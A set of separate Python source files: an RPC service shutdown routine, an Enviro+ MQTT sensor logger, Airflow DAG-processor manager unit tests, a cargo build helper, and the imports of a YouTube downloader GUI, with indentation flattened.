"Service %s listening on %d, PID = %d", working_dir, port, os.getpid()
)
server.start()
# Block on the RPC service in a separate thread. This enables the
# current thread to handle the shutdown routine.
server_thread = Thread(target=server.wait_for_termination)
server_thread.start()
# Block until the shutdown signal is received.
shutdown_signal.wait()
logging.info("Shutting down the RPC service")
server.stop(60).wait()
server_thread.join()
logging.info("Service closed")
if len(service.sessions):
print(
"ERROR: Killing a service with",
plural(len(service.sessions), "active session", "active sessions"),
file=sys.stderr,
)
sys.exit(6)
app.run(main)
|
logger.py
|
import collections, threading, traceback
import paho.mqtt.client as mqtt
try:
# Transitional fix for breaking change in LTR559
from ltr559 import LTR559
ltr559 = LTR559()
except ImportError:
import ltr559
from bme280 import BME280
from pms5003 import PMS5003
from enviroplus import gas
class EnvLogger:
def __init__(self, client_id, host, port, username, password, prefix, use_pms5003, num_samples):
self.bme280 = BME280()
self.prefix = prefix
self.connection_error = None
self.client = mqtt.Client(client_id=client_id)
self.client.on_connect = self.__on_connect
self.client.username_pw_set(username, password)
self.client.connect(host, port)
self.client.loop_start()
self.samples = collections.deque(maxlen=num_samples)
self.latest_pms_readings = {}
if use_pms5003:
self.pm_thread = threading.Thread(target=self.__read_pms_continuously)
self.pm_thread.daemon = True
self.pm_thread.start()
def temperature_compensation(self, temp_sensor):
with open('/sys/class/thermal/thermal_zone0/temp', 'r') as f:
data = f.readlines()
# temp_cpu is in millidegrees Celsius, so divide by 1000
temp_cpu = int(data[0].rstrip())
temp_corrected = temp_sensor-(1*((temp_cpu/1000)-temp_sensor)/14.5)-15 # calculated correction
return temp_corrected
def __on_connect(self, client, userdata, flags, rc):
errors = {
1: "incorrect MQTT protocol version",
2: "invalid MQTT client identifier",
3: "server unavailable",
4: "bad username or password",
5: "connection refused"
}
if rc > 0:
self.connection_error = errors.get(rc, "unknown error")
def __read_pms_continuously(self):
"""Continuously reads from the PMS5003 sensor and stores the most recent values
in `self.latest_pms_readings` as they become available.
If the sensor is not polled continuously then readings are buffered on the PMS5003,
and over time a significant delay is introduced between changes in PM levels and
the corresponding change in reported levels."""
pms = PMS5003()
while True:
try:
pm_data = pms.read()
self.latest_pms_readings = {
"particulate/1.0": pm_data.pm_ug_per_m3(1.0, atmospheric_environment=True),
"particulate/2.5": pm_data.pm_ug_per_m3(2.5, atmospheric_environment=True),
"particulate/10.0": pm_data.pm_ug_per_m3(None, atmospheric_environment=True),
}
except Exception:
print("Failed to read from PMS5003. Resetting sensor.")
traceback.print_exc()
pms.reset()
def take_readings(self):
gas_data = gas.read_all()
readings = {
"proximity": ltr559.get_proximity(),
"lux": ltr559.get_lux(),
"temperature": self.temperature_compensation(float(self.bme280.get_temperature())),
"pressure": self.bme280.get_pressure(),
"humidity": self.bme280.get_humidity(),
"gas/oxidising": gas_data.oxidising,
"gas/reducing": gas_data.reducing,
"gas/nh3": gas_data.nh3,
}
readings.update(self.latest_pms_readings)
return readings
def publish(self, topic, value):
topic = self.prefix.strip("/") + "/" + topic
self.client.publish(topic, str(value))
def update(self, publish_readings=True):
self.samples.append(self.take_readings())
if publish_readings:
for topic in self.samples[0].keys():
value_sum = sum([d[topic] for d in self.samples])
value_avg = value_sum / len(self.samples)
self.publish(topic, value_avg)
def destroy(self):
self.client.disconnect()
self.client.loop_stop()
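# Example usage (hedged sketch; broker details, credentials and the publish
# interval are illustrative, and `sleep` would need `from time import sleep`):
#
#     logger = EnvLogger(client_id="enviro", host="localhost", port=1883,
#                        username="user", password="pass", prefix="home/enviro",
#                        use_pms5003=False, num_samples=5)
#     while True:
#         logger.update()
#         sleep(30)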
|
test_manager.py
|
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
import logging
import multiprocessing
import os
import pathlib
import random
import socket
import sys
import threading
import unittest
from datetime import datetime, timedelta
from tempfile import TemporaryDirectory
from textwrap import dedent
from unittest import mock
from unittest.mock import MagicMock, PropertyMock
import pytest
from freezegun import freeze_time
from airflow.configuration import conf
from airflow.dag_processing.manager import (
DagFileProcessorAgent,
DagFileProcessorManager,
DagFileStat,
DagParsingSignal,
DagParsingStat,
)
from airflow.dag_processing.processor import DagFileProcessorProcess
from airflow.jobs.local_task_job import LocalTaskJob as LJ
from airflow.models import DagBag, DagModel, TaskInstance as TI, errors
from airflow.models.dagcode import DagCode
from airflow.models.serialized_dag import SerializedDagModel
from airflow.models.taskinstance import SimpleTaskInstance
from airflow.utils import timezone
from airflow.utils.callback_requests import CallbackRequest, TaskCallbackRequest
from airflow.utils.net import get_hostname
from airflow.utils.session import create_session
from airflow.utils.state import DagRunState, State
from airflow.utils.types import DagRunType
from tests.core.test_logging_config import SETTINGS_FILE_VALID, settings_context
from tests.models import TEST_DAGS_FOLDER
from tests.test_utils.config import conf_vars
from tests.test_utils.db import clear_db_dags, clear_db_runs, clear_db_serialized_dags
TEST_DAG_FOLDER = pathlib.Path(__file__).parent.parent / 'dags'
DEFAULT_DATE = timezone.datetime(2016, 1, 1)
class FakeDagFileProcessorRunner(DagFileProcessorProcess):
# This fake processor will return the zombies it received in constructor
# as its processing result w/o actually parsing anything.
def __init__(self, file_path, pickle_dags, dag_ids, callbacks):
super().__init__(file_path, pickle_dags, dag_ids, callbacks)
# We need a "real" selectable handle for waitable_handle to work
readable, writable = multiprocessing.Pipe(duplex=False)
writable.send('abc')
writable.close()
self._waitable_handle = readable
self._result = 0, 0
def start(self):
pass
@property
def start_time(self):
return DEFAULT_DATE
@property
def pid(self):
return 1234
@property
def done(self):
return True
@property
def result(self):
return self._result
@staticmethod
def _create_process(file_path, callback_requests, dag_ids, pickle_dags):
return FakeDagFileProcessorRunner(
file_path,
pickle_dags,
dag_ids,
callback_requests,
)
@property
def waitable_handle(self):
return self._waitable_handle
class TestDagFileProcessorManager:
def setup_method(self):
clear_db_runs()
clear_db_serialized_dags()
clear_db_dags()
def teardown_class(self):
clear_db_runs()
clear_db_serialized_dags()
clear_db_dags()
def run_processor_manager_one_loop(self, manager, parent_pipe):
if not manager._async_mode:
parent_pipe.send(DagParsingSignal.AGENT_RUN_ONCE)
results = []
while True:
manager._run_parsing_loop()
while parent_pipe.poll(timeout=0.01):
obj = parent_pipe.recv()
if not isinstance(obj, DagParsingStat):
results.append(obj)
elif obj.done:
return results
raise RuntimeError("Shouldn't get here - nothing to read, but manager not finished!")
@conf_vars({('core', 'load_examples'): 'False'})
def test_remove_file_clears_import_error(self, tmpdir):
filename_to_parse = tmpdir / 'temp_dag.py'
# Generate original import error
with open(filename_to_parse, 'w') as file_to_parse:
file_to_parse.writelines('an invalid airflow DAG')
child_pipe, parent_pipe = multiprocessing.Pipe()
async_mode = 'sqlite' not in conf.get('core', 'sql_alchemy_conn')
manager = DagFileProcessorManager(
dag_directory=tmpdir,
max_runs=1,
processor_timeout=timedelta.max,
signal_conn=child_pipe,
dag_ids=[],
pickle_dags=False,
async_mode=async_mode,
)
with create_session() as session:
self.run_processor_manager_one_loop(manager, parent_pipe)
import_errors = session.query(errors.ImportError).all()
assert len(import_errors) == 1
filename_to_parse.remove()
# Rerun the scheduler once the dag file has been removed
self.run_processor_manager_one_loop(manager, parent_pipe)
import_errors = session.query(errors.ImportError).all()
assert len(import_errors) == 0
session.rollback()
child_pipe.close()
parent_pipe.close()
@conf_vars({('core', 'load_examples'): 'False'})
def test_max_runs_when_no_files(self):
child_pipe, parent_pipe = multiprocessing.Pipe()
with TemporaryDirectory(prefix="empty-airflow-dags-") as dags_folder:
async_mode = 'sqlite' not in conf.get('core', 'sql_alchemy_conn')
manager = DagFileProcessorManager(
dag_directory=dags_folder,
max_runs=1,
processor_timeout=timedelta.max,
signal_conn=child_pipe,
dag_ids=[],
pickle_dags=False,
async_mode=async_mode,
)
self.run_processor_manager_one_loop(manager, parent_pipe)
child_pipe.close()
parent_pipe.close()
@pytest.mark.backend("mysql", "postgres")
def test_start_new_processes_with_same_filepath(self):
"""
Test that when a processor already exists with a filepath, a new processor won't be created
with that filepath. The filepath will just be removed from the list.
"""
manager = DagFileProcessorManager(
dag_directory='directory',
max_runs=1,
processor_timeout=timedelta.max,
signal_conn=MagicMock(),
dag_ids=[],
pickle_dags=False,
async_mode=True,
)
file_1 = 'file_1.py'
file_2 = 'file_2.py'
file_3 = 'file_3.py'
manager._file_path_queue = [file_1, file_2, file_3]
# Mock that only one processor exists. This processor runs with 'file_1'
manager._processors[file_1] = MagicMock()
# Start New Processes
manager.start_new_processes()
# Because of the config: '[scheduler] parsing_processes = 2'
# verify that only one extra process is created
# and since a processor with 'file_1' already exists,
# even though it is first in '_file_path_queue'
# a new processor is created with 'file_2' and not 'file_1'.
assert file_1 in manager._processors.keys()
assert file_2 in manager._processors.keys()
assert [file_3] == manager._file_path_queue
def test_set_file_paths_when_processor_file_path_not_in_new_file_paths(self):
manager = DagFileProcessorManager(
dag_directory='directory',
max_runs=1,
processor_timeout=timedelta.max,
signal_conn=MagicMock(),
dag_ids=[],
pickle_dags=False,
async_mode=True,
)
mock_processor = MagicMock()
mock_processor.stop.side_effect = AttributeError('DagFileProcessor object has no attribute stop')
mock_processor.terminate.side_effect = None
manager._processors['missing_file.txt'] = mock_processor
manager._file_stats['missing_file.txt'] = DagFileStat(0, 0, None, None, 0)
manager.set_file_paths(['abc.txt'])
assert manager._processors == {}
def test_set_file_paths_when_processor_file_path_is_in_new_file_paths(self):
manager = DagFileProcessorManager(
dag_directory='directory',
max_runs=1,
processor_timeout=timedelta.max,
signal_conn=MagicMock(),
dag_ids=[],
pickle_dags=False,
async_mode=True,
)
mock_processor = MagicMock()
mock_processor.stop.side_effect = AttributeError('DagFileProcessor object has no attribute stop')
mock_processor.terminate.side_effect = None
manager._processors['abc.txt'] = mock_processor
manager.set_file_paths(['abc.txt'])
assert manager._processors == {'abc.txt': mock_processor}
@conf_vars({("scheduler", "file_parsing_sort_mode"): "alphabetical"})
@mock.patch("zipfile.is_zipfile", return_value=True)
@mock.patch("airflow.utils.file.might_contain_dag", return_value=True)
@mock.patch("airflow.utils.file.find_path_from_directory", return_value=True)
@mock.patch("airflow.utils.file.os.path.isfile", return_value=True)
def test_file_paths_in_queue_sorted_alphabetically(
self, mock_isfile, mock_find_path, mock_might_contain_dag, mock_zipfile
):
"""Test dag files are sorted alphabetically"""
dag_files = ["file_3.py", "file_2.py", "file_4.py", "file_1.py"]
mock_find_path.return_value = dag_files
manager = DagFileProcessorManager(
dag_directory='directory',
max_runs=1,
processor_timeout=timedelta.max,
signal_conn=MagicMock(),
dag_ids=[],
pickle_dags=False,
async_mode=True,
)
manager.set_file_paths(dag_files)
assert manager._file_path_queue == []
manager.prepare_file_path_queue()
assert manager._file_path_queue == ['file_1.py', 'file_2.py', 'file_3.py', 'file_4.py']
@conf_vars({("scheduler", "file_parsing_sort_mode"): "random_seeded_by_host"})
@mock.patch("zipfile.is_zipfile", return_value=True)
@mock.patch("airflow.utils.file.might_contain_dag", return_value=True)
@mock.patch("airflow.utils.file.find_path_from_directory", return_value=True)
@mock.patch("airflow.utils.file.os.path.isfile", return_value=True)
def test_file_paths_in_queue_sorted_random_seeded_by_host(
self, mock_isfile, mock_find_path, mock_might_contain_dag, mock_zipfile
):
"""Test files are randomly sorted and seeded by host name"""
dag_files = ["file_3.py", "file_2.py", "file_4.py", "file_1.py"]
mock_find_path.return_value = dag_files
manager = DagFileProcessorManager(
dag_directory='directory',
max_runs=1,
processor_timeout=timedelta.max,
signal_conn=MagicMock(),
dag_ids=[],
pickle_dags=False,
async_mode=True,
)
manager.set_file_paths(dag_files)
assert manager._file_path_queue == []
manager.prepare_file_path_queue()
expected_order = dag_files
random.Random(get_hostname()).shuffle(expected_order)
assert manager._file_path_queue == expected_order
# Verify running it again produces same order
manager._file_paths = []
manager.prepare_file_path_queue()
assert manager._file_path_queue == expected_order
@conf_vars({("scheduler", "file_parsing_sort_mode"): "modified_time"})
@mock.patch("zipfile.is_zipfile", return_value=True)
@mock.patch("airflow.utils.file.might_contain_dag", return_value=True)
@mock.patch("airflow.utils.file.find_path_from_directory", return_value=True)
@mock.patch("airflow.utils.file.os.path.isfile", return_value=True)
@mock.patch("airflow.utils.file.os.path.getmtime")
def test_file_paths_in_queue_sorted_by_modified_time(
self, mock_getmtime, mock_isfile, mock_find_path, mock_might_contain_dag, mock_zipfile
):
"""Test files are sorted by modified time"""
paths_with_mtime = {"file_3.py": 3.0, "file_2.py": 2.0, "file_4.py": 5.0, "file_1.py": 4.0}
dag_files = list(paths_with_mtime.keys())
mock_getmtime.side_effect = list(paths_with_mtime.values())
mock_find_path.return_value = dag_files
manager = DagFileProcessorManager(
dag_directory='directory',
max_runs=1,
processor_timeout=timedelta.max,
signal_conn=MagicMock(),
dag_ids=[],
pickle_dags=False,
async_mode=True,
)
manager.set_file_paths(dag_files)
assert manager._file_path_queue == []
manager.prepare_file_path_queue()
assert manager._file_path_queue == ['file_4.py', 'file_1.py', 'file_3.py', 'file_2.py']
@conf_vars({("scheduler", "file_parsing_sort_mode"): "modified_time"})
@mock.patch("zipfile.is_zipfile", return_value=True)
@mock.patch("airflow.utils.file.might_contain_dag", return_value=True)
@mock.patch("airflow.utils.file.find_path_from_directory", return_value=True)
@mock.patch("airflow.utils.file.os.path.isfile", return_value=True)
@mock.patch("airflow.utils.file.os.path.getmtime")
def test_recently_modified_file_is_parsed_with_mtime_mode(
self, mock_getmtime, mock_isfile, mock_find_path, mock_might_contain_dag, mock_zipfile
):
"""
Test recently updated files are processed even if min_file_process_interval is not reached
"""
freezed_base_time = timezone.datetime(2020, 1, 5, 0, 0, 0)
initial_file_1_mtime = (freezed_base_time - timedelta(minutes=5)).timestamp()
dag_files = ["file_1.py"]
mock_getmtime.side_effect = [initial_file_1_mtime]
mock_find_path.return_value = dag_files
manager = DagFileProcessorManager(
dag_directory='directory',
max_runs=3,
processor_timeout=timedelta.max,
signal_conn=MagicMock(),
dag_ids=[],
pickle_dags=False,
async_mode=True,
)
# Let's say the DAG was last parsed 10 seconds before the frozen time
last_finish_time = freezed_base_time - timedelta(seconds=10)
manager._file_stats = {
"file_1.py": DagFileStat(1, 0, last_finish_time, 1.0, 1),
}
with freeze_time(freezed_base_time):
manager.set_file_paths(dag_files)
assert manager._file_path_queue == []
# File Path Queue will be empty as the "modified time" < "last finish time"
manager.prepare_file_path_queue()
assert manager._file_path_queue == []
# Simulate a DAG modification: the new modified_time is later than the last parse time,
# even though min_file_process_interval has not yet elapsed since that parse
file_1_new_mtime = freezed_base_time - timedelta(seconds=5)
file_1_new_mtime_ts = file_1_new_mtime.timestamp()
with freeze_time(freezed_base_time):
manager.set_file_paths(dag_files)
assert manager._file_path_queue == []
# File Path Queue will be empty as the "modified time" < "last finish time"
mock_getmtime.side_effect = [file_1_new_mtime_ts]
manager.prepare_file_path_queue()
# Check that the file is added to the queue even though it was parsed only recently
assert manager._file_path_queue == ["file_1.py"]
assert last_finish_time < file_1_new_mtime
assert (
manager._file_process_interval
> (freezed_base_time - manager.get_last_finish_time("file_1.py")).total_seconds()
)
def test_find_zombies(self):
manager = DagFileProcessorManager(
dag_directory='directory',
max_runs=1,
processor_timeout=timedelta.max,
signal_conn=MagicMock(),
dag_ids=[],
pickle_dags=False,
async_mode=True,
)
dagbag = DagBag(TEST_DAG_FOLDER, read_dags_from_db=False)
with create_session() as session:
session.query(LJ).delete()
dag = dagbag.get_dag('example_branch_operator')
dag.sync_to_db()
task = dag.get_task(task_id='run_this_first')
dag_run = dag.create_dagrun(
state=DagRunState.RUNNING,
execution_date=DEFAULT_DATE,
run_type=DagRunType.SCHEDULED,
session=session,
)
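# A task instance left in RUNNING state while its LocalTaskJob is SHUTDOWN is what _find_zombies should flag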
ti = TI(task, run_id=dag_run.run_id, state=State.RUNNING)
local_job = LJ(ti)
local_job.state = State.SHUTDOWN
session.add(local_job)
session.flush()
ti.job_id = local_job.id
session.add(ti)
session.flush()
manager._last_zombie_query_time = timezone.utcnow() - timedelta(
seconds=manager._zombie_threshold_secs + 1
)
manager._find_zombies()
requests = manager._callback_to_execute[dag.fileloc]
assert 1 == len(requests)
assert requests[0].full_filepath == dag.fileloc
assert requests[0].msg == "Detected as zombie"
assert requests[0].is_failure_callback is True
assert isinstance(requests[0].simple_task_instance, SimpleTaskInstance)
assert ti.dag_id == requests[0].simple_task_instance.dag_id
assert ti.task_id == requests[0].simple_task_instance.task_id
assert ti.run_id == requests[0].simple_task_instance.run_id
session.query(TI).delete()
session.query(LJ).delete()
@mock.patch('airflow.dag_processing.manager.DagFileProcessorProcess')
def test_handle_failure_callback_with_zombies_are_correctly_passed_to_dag_file_processor(
self, mock_processor
):
"""
Check that the same set of failure callback with zombies are passed to the dag
file processors until the next zombie detection logic is invoked.
"""
test_dag_path = TEST_DAG_FOLDER / 'test_example_bash_operator.py'
with conf_vars({('scheduler', 'parsing_processes'): '1', ('core', 'load_examples'): 'False'}):
dagbag = DagBag(test_dag_path, read_dags_from_db=False)
with create_session() as session:
session.query(LJ).delete()
dag = dagbag.get_dag('test_example_bash_operator')
dag.sync_to_db()
dag_run = dag.create_dagrun(
state=DagRunState.RUNNING,
execution_date=DEFAULT_DATE,
run_type=DagRunType.SCHEDULED,
session=session,
)
task = dag.get_task(task_id='run_this_last')
ti = TI(task, run_id=dag_run.run_id, state=State.RUNNING)
local_job = LJ(ti)
local_job.state = State.SHUTDOWN
session.add(local_job)
session.flush()
# TODO: If there was an actual Relationship between TI and Job
# we wouldn't need this extra commit
session.add(ti)
ti.job_id = local_job.id
session.flush()
expected_failure_callback_requests = [
TaskCallbackRequest(
full_filepath=dag.fileloc,
simple_task_instance=SimpleTaskInstance(ti),
msg="Message",
)
]
test_dag_path = TEST_DAG_FOLDER / 'test_example_bash_operator.py'
child_pipe, parent_pipe = multiprocessing.Pipe()
async_mode = 'sqlite' not in conf.get('core', 'sql_alchemy_conn')
fake_processors = []
def fake_processor_(*args, **kwargs):
nonlocal fake_processors
processor = FakeDagFileProcessorRunner._create_process(*args, **kwargs)
fake_processors.append(processor)
return processor
mock_processor.side_effect = fake_processor_
manager = DagFileProcessorManager(
dag_directory=test_dag_path,
max_runs=1,
processor_timeout=timedelta.max,
signal_conn=child_pipe,
dag_ids=[],
pickle_dags=False,
async_mode=async_mode,
)
self.run_processor_manager_one_loop(manager, parent_pipe)
if async_mode:
# Once for initial parse, and then again for the add_callback_to_queue
assert len(fake_processors) == 2
assert fake_processors[0]._file_path == str(test_dag_path)
assert fake_processors[0]._callback_requests == []
else:
assert len(fake_processors) == 1
assert fake_processors[-1]._file_path == str(test_dag_path)
callback_requests = fake_processors[-1]._callback_requests
assert {zombie.simple_task_instance.key for zombie in expected_failure_callback_requests} == {
result.simple_task_instance.key for result in callback_requests
}
child_pipe.close()
parent_pipe.close()
@mock.patch("airflow.dag_processing.processor.DagFileProcessorProcess.pid", new_callable=PropertyMock)
@mock.patch("airflow.dag_processing.processor.DagFileProcessorProcess.kill")
def test_kill_timed_out_processors_kill(self, mock_kill, mock_pid):
mock_pid.return_value = 1234
manager = DagFileProcessorManager(
dag_directory='directory',
max_runs=1,
processor_timeout=timedelta(seconds=5),
signal_conn=MagicMock(),
dag_ids=[],
pickle_dags=False,
async_mode=True,
)
processor = DagFileProcessorProcess('abc.txt', False, [], [])
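# A start time of datetime.min is far beyond the 5-second processor_timeout, so this processor should be killed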
processor._start_time = timezone.make_aware(datetime.min)
manager._processors = {'abc.txt': processor}
manager._kill_timed_out_processors()
mock_kill.assert_called_once_with()
@mock.patch("airflow.dag_processing.processor.DagFileProcessorProcess.pid", new_callable=PropertyMock)
@mock.patch("airflow.dag_processing.processor.DagFileProcessorProcess")
def test_kill_timed_out_processors_no_kill(self, mock_dag_file_processor, mock_pid):
mock_pid.return_value = 1234
manager = DagFileProcessorManager(
dag_directory='directory',
max_runs=1,
processor_timeout=timedelta(seconds=5),
signal_conn=MagicMock(),
dag_ids=[],
pickle_dags=False,
async_mode=True,
)
processor = DagFileProcessorProcess('abc.txt', False, [], [])
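# A start time of datetime.max means the timeout cannot have elapsed, so kill() must not be called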
processor._start_time = timezone.make_aware(datetime.max)
manager._processors = {'abc.txt': processor}
manager._kill_timed_out_processors()
mock_dag_file_processor.kill.assert_not_called()
@conf_vars({('core', 'load_examples'): 'False'})
@pytest.mark.execution_timeout(10)
def test_dag_with_system_exit(self):
"""
Test to check that a DAG with a system.exit() doesn't break the scheduler.
"""
dag_id = 'exit_test_dag'
dag_directory = TEST_DAG_FOLDER.parent / 'dags_with_system_exit'
# Delete the one valid DAG/SerializedDAG, and check that it gets re-created
clear_db_dags()
clear_db_serialized_dags()
child_pipe, parent_pipe = multiprocessing.Pipe()
manager = DagFileProcessorManager(
dag_directory=dag_directory,
dag_ids=[],
max_runs=1,
processor_timeout=timedelta(seconds=5),
signal_conn=child_pipe,
pickle_dags=False,
async_mode=True,
)
manager._run_parsing_loop()
result = None
while parent_pipe.poll(timeout=None):
result = parent_pipe.recv()
if isinstance(result, DagParsingStat) and result.done:
break
# Three files in folder should be processed
assert sum(stat.run_count for stat in manager._file_stats.values()) == 3
with create_session() as session:
assert session.query(DagModel).get(dag_id) is not None
@conf_vars({('core', 'load_examples'): 'False'})
@pytest.mark.backend("mysql", "postgres")
@pytest.mark.execution_timeout(30)
@mock.patch('airflow.dag_processing.manager.DagFileProcessorProcess')
def test_pipe_full_deadlock(self, mock_processor):
dag_filepath = TEST_DAG_FOLDER / "test_scheduler_dags.py"
child_pipe, parent_pipe = multiprocessing.Pipe()
# Shrink the buffers to exacerbate the problem!
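# (wrap the pipe's fd in a socket just long enough to set tiny SO_SNDBUF/SO_RCVBUF values, then detach so the fd stays open)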
for fd in (parent_pipe.fileno(),):
sock = socket.socket(fileno=fd)
sock.setsockopt(socket.SOL_SOCKET, socket.SO_SNDBUF, 1024)
sock.setsockopt(socket.SOL_SOCKET, socket.SO_RCVBUF, 1024)
sock.detach()
exit_event = threading.Event()
# To test this behaviour we need something that continually fills the
# parent pipe's buffer (and keeps it full).
def keep_pipe_full(pipe, exit_event):
n = 0
while True:
if exit_event.is_set():
break
req = CallbackRequest(str(dag_filepath))
try:
logging.debug("Sending CallbackRequests %d", n + 1)
pipe.send(req)
except TypeError:
# This is actually the error you get when the parent pipe
# is closed! Nicely handled, eh?
break
except OSError:
break
n += 1
logging.debug(" Sent %d CallbackRequests", n)
thread = threading.Thread(target=keep_pipe_full, args=(parent_pipe, exit_event))
fake_processors = []
def fake_processor_(*args, **kwargs):
nonlocal fake_processors
processor = FakeDagFileProcessorRunner._create_process(*args, **kwargs)
fake_processors.append(processor)
return processor
mock_processor.side_effect = fake_processor_
manager = DagFileProcessorManager(
dag_directory=dag_filepath,
dag_ids=[],
# A reasonably large number to ensure that we trigger the deadlock
max_runs=100,
processor_timeout=timedelta(seconds=5),
signal_conn=child_pipe,
pickle_dags=False,
async_mode=True,
)
try:
thread.start()
# If this completes without hanging, then the test is good!
manager._run_parsing_loop()
exit_event.set()
finally:
logging.info("Closing pipes")
parent_pipe.close()
child_pipe.close()
thread.join(timeout=1.0)
@conf_vars({('core', 'load_examples'): 'False'})
@mock.patch('airflow.dag_processing.manager.Stats.timing')
def test_send_file_processing_statsd_timing(self, statsd_timing_mock, tmpdir):
filename_to_parse = tmpdir / 'temp_dag.py'
dag_code = dedent(
"""
from airflow import DAG
dag = DAG(dag_id='temp_dag', schedule_interval='0 0 * * *')
"""
)
with open(filename_to_parse, 'w') as file_to_parse:
file_to_parse.writelines(dag_code)
child_pipe, parent_pipe = multiprocessing.Pipe()
async_mode = 'sqlite' not in conf.get('core', 'sql_alchemy_conn')
manager = DagFileProcessorManager(
dag_directory=tmpdir,
max_runs=1,
processor_timeout=timedelta.max,
signal_conn=child_pipe,
dag_ids=[],
pickle_dags=False,
async_mode=async_mode,
)
self.run_processor_manager_one_loop(manager, parent_pipe)
last_runtime = manager.get_last_runtime(manager.file_paths[0])
child_pipe.close()
parent_pipe.close()
statsd_timing_mock.assert_called_with('dag_processing.last_duration.temp_dag', last_runtime)
def test_refresh_dags_dir_doesnt_delete_zipped_dags(self, tmpdir):
"""Test DagFileProcessorManager._refresh_dag_dir method"""
manager = DagFileProcessorManager(
dag_directory=TEST_DAG_FOLDER,
max_runs=1,
processor_timeout=timedelta.max,
signal_conn=MagicMock(),
dag_ids=[],
pickle_dags=False,
async_mode=True,
)
dagbag = DagBag(dag_folder=tmpdir, include_examples=False)
zipped_dag_path = os.path.join(TEST_DAGS_FOLDER, "test_zip.zip")
dagbag.process_file(zipped_dag_path)
dag = dagbag.get_dag("test_zip_dag")
dag.sync_to_db()
SerializedDagModel.write_dag(dag)
manager.last_dag_dir_refresh_time = timezone.utcnow() - timedelta(minutes=10)
manager._refresh_dag_dir()
# Assert dag not deleted in SDM
assert SerializedDagModel.has_dag('test_zip_dag')
# Assert the DAG code was not deleted
assert DagCode.has_dag(dag.fileloc)
class TestDagFileProcessorAgent(unittest.TestCase):
def setUp(self):
# Make sure that the configure_logging is not cached
self.old_modules = dict(sys.modules)
def tearDown(self):
# Remove any new modules imported during the test run. This lets us
# import the same source files for more than one test.
remove_list = []
for mod in sys.modules:
if mod not in self.old_modules:
remove_list.append(mod)
for mod in remove_list:
del sys.modules[mod]
@staticmethod
def _processor_factory(file_path, zombies, dag_ids, pickle_dags):
return DagFileProcessorProcess(file_path, pickle_dags, dag_ids, zombies)
def test_reload_module(self):
"""
Configure the context to have logging.logging_config_class set to a fake logging
class path, thus when reloading logging module the airflow.processor_manager
logger should not be configured.
"""
with settings_context(SETTINGS_FILE_VALID):
# Launch a process through DagFileProcessorAgent, which will try
# reload the logging module.
test_dag_path = TEST_DAG_FOLDER / 'test_scheduler_dags.py'
async_mode = 'sqlite' not in conf.get('core', 'sql_alchemy_conn')
log_file_loc = conf.get('logging', 'DAG_PROCESSOR_MANAGER_LOG_LOCATION')
try:
os.remove(log_file_loc)
except OSError:
pass
# Starting dag processing with 0 max_runs to avoid redundant operations.
processor_agent = DagFileProcessorAgent(test_dag_path, 0, timedelta.max, [], False, async_mode)
processor_agent.start()
if not async_mode:
processor_agent.run_single_parsing_loop()
processor_agent._process.join()
# Since we are reloading the logging config rather than creating this file,
# we expect it to be nonexistent.
assert not os.path.isfile(log_file_loc)
@conf_vars({('core', 'load_examples'): 'False'})
def test_parse_once(self):
clear_db_serialized_dags()
clear_db_dags()
test_dag_path = TEST_DAG_FOLDER / 'test_scheduler_dags.py'
async_mode = 'sqlite' not in conf.get('core', 'sql_alchemy_conn')
processor_agent = DagFileProcessorAgent(test_dag_path, 1, timedelta.max, [], False, async_mode)
processor_agent.start()
if not async_mode:
processor_agent.run_single_parsing_loop()
while not processor_agent.done:
if not async_mode:
processor_agent.wait_until_finished()
processor_agent.heartbeat()
assert processor_agent.all_files_processed
assert processor_agent.done
with create_session() as session:
dag_ids = session.query(DagModel.dag_id).order_by("dag_id").all()
assert dag_ids == [('test_start_date_scheduling',), ('test_task_start_date_scheduling',)]
dag_ids = session.query(SerializedDagModel.dag_id).order_by("dag_id").all()
assert dag_ids == [('test_start_date_scheduling',), ('test_task_start_date_scheduling',)]
def test_launch_process(self):
test_dag_path = TEST_DAG_FOLDER / 'test_scheduler_dags.py'
async_mode = 'sqlite' not in conf.get('core', 'sql_alchemy_conn')
log_file_loc = conf.get('logging', 'DAG_PROCESSOR_MANAGER_LOG_LOCATION')
try:
os.remove(log_file_loc)
except OSError:
pass
# Starting dag processing with 0 max_runs to avoid redundant operations.
processor_agent = DagFileProcessorAgent(test_dag_path, 0, timedelta.max, [], False, async_mode)
processor_agent.start()
if not async_mode:
processor_agent.run_single_parsing_loop()
processor_agent._process.join()
assert os.path.isfile(log_file_loc)
|
utilbuild.py
|
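# Read a subprocess pipe line by line and push each line onto the queue; a trailing None signals EOF to the consumer.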
def output_reader(pipe, queue):
try:
with pipe:
for line in iter(pipe.readline, b''):
queue.put(line)
finally:
queue.put(None)
def cargo_run(args, logging, cwd = None, faketime = None):
import subprocess
import shutil
from threading import Thread
from queue import Queue
if faketime is None:
faketime = []
else:
faketime_bin = shutil.which("faketime")
if faketime_bin is None:
logging.error("Please install faketime")
raise Exception("faketime not found")
faketime = [faketime_bin, "-m", faketime]
cargo = shutil.which("cargo")
assert cargo is not None  # fail fast if cargo is not on PATH
args = faketime + [cargo] + args
logging.info("Running %s", " ".join(args))
p = subprocess.Popen(args,
stdout = subprocess.PIPE, stderr = subprocess.PIPE, cwd = cwd)
q = Queue()
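# Merge stdout and stderr into one queue so output is logged in arrival order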
Thread(target = output_reader, args = [p.stdout, q]).start()
Thread(target = output_reader, args = [p.stderr, q]).start()
for line in iter(q.get, None):
logging.debug(line.decode('utf-8').rstrip())
p.wait()
rc = p.returncode
assert rc is not None
if rc != 0:
raise Exception("cargo failed with return code %s" % rc)
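# Example usage (a minimal sketch; the crate path and faketime timestamp are assumptions):
#   import logging
#   logging.basicConfig(level=logging.DEBUG)
#   cargo_run(["build", "--release"], logging, cwd="path/to/crate")
#   cargo_run(["test"], logging, cwd="path/to/crate", faketime="2021-01-01 00:00:00")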
|
yt_downloader_with_GUI_new.py
|
import glob
import os
import re
import sys
import urllib
from tkinter import (BOTH, CENTER, RIGHT, YES, HORIZONTAL, Button, Entry, Label, Listbox, Menu,
Scrollbar, StringVar, Tk, Toplevel, Y, font)
from tkinter import messagebox as m_box
from tkinter.ttk import Progressbar
